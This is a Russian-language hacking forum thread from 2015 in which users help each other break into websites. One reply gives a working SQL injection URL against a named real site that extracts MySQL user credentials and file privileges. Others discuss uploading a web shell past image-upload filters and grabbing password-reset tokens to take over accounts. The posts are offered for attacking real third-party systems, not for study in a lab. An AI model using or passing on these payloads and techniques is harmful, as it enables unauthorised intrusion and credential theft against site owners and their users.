05.06.2015, 23:58
|
|
Новичок
Регистрация: 17.10.2011
Сообщений: 14
С нами:
7669046
Репутация:
0
|
|
|
|
|
06.06.2015, 00:10
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Название БД в которую обращаешься, должно быть в чистом виде
в вашем случае пример актуального запроса:
_ttp://actachemscand.dk/author.php?aid=1126+and+1=0+union+select+1,2,conca t_ws(0x3a,host,user,password,file_priv),4+from+mys ql.user+--+
|
|
|
|
06.06.2015, 02:27
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от Ravenous
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
данный плагин не работает на последних версиях FF, устанавливайте старую версию ( до 30, если не ошибаюсь), если хоитите пользоваться данным плагином и не искать альтернативу
|
|
|
|
06.06.2015, 03:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
приучайте себя работать с burp suite или аналогами. они передают данные как есть, без urlencode
|
|
|
|
06.06.2015, 12:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Filipp
↑
Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
Сообщение от Mister_Bert0ni
↑
Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
вы про mysql?
|
|
|
|
06.06.2015, 15:34
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
|
|
|
|
06.06.2015, 15:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Mister_Bert0ni
mysql различает запросы на модификацию и выборку. в select нельзя сделать update
|
|
|
|
06.06.2015, 15:47
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами:
5795606
Репутация:
31
|
|
Сообщение от yarbabin
↑
mysql различает запросы на модификацию и выборку. в select нельзя сделать update
Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
|
|
|
|
06.06.2015, 15:48
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Filipp
↑
Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
нет. http://www.mysql.ru/docs/man/UNION.html
|
|
|
|
06.06.2015, 22:42
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Сообщение от yarbabin
↑
mysql различает запросы на модификацию и выборку. в select нельзя сделать update
если я првильно понял то при ввборке из базы я никак не смогу внедрить апдейт или инсерт?Смогу поменять пароль только если есть кнопка забыли пароль и я смогу вытянуть токен которыц отсылаеться на эмейл для сброса пароля?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
